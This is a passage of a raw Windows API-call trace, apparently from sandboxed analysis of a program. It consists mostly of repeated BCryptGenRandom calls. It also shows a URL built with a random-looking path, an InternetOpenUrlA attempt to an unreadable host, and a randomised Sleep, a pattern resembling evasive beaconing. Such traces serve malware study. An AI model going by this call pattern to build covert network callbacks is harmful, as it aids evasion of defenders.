cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.553] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b267, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a1b267) returned 0x0 [0270.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0270.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.564] GetProcessHeap () returned 0x440000 [0270.564] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0270.564] lstrcpyA (in: lpString1=0x4726f0, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0270.564] lstrcatA (in: lpString1="P²¡\x03", lpString2="/91mAxVxgkeQmge2qC1jZa/qw6YFu4cy3tf72z4gj5gd3wvB22/" | out: lpString1="P²¡\x03/91mAxVxgkeQmge2qC1jZa/qw6YFu4cy3tf72z4gj5gd3wvB22/") returned="P²¡\x03/91mAxVxgkeQmge2qC1jZa/qw6YFu4cy3tf72z4gj5gd3wvB22/" [0270.564] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0270.564] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/91mAxVxgkeQmge2qC1jZa/qw6YFu4cy3tf72z4gj5gd3wvB22/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0270.565] GetProcessHeap () returned 0x440000 [0270.565] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0270.565] GetProcessHeap () returned 0x440000 [0270.565] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0270.565] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0270.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0270.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0270.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0270.567] Sleep (dwMilliseconds=0x124c6) [0270.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0270.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.816] GetProcessHeap () returned 0x440000 [0270.816] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5050 [0270.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5051, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x4d5051) returned 0x0 [0270.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0270.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0270.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0270.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d507a, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d507a) returned 0x0 [0270.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0270.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5095, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d5095) returned 0x0 [0270.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 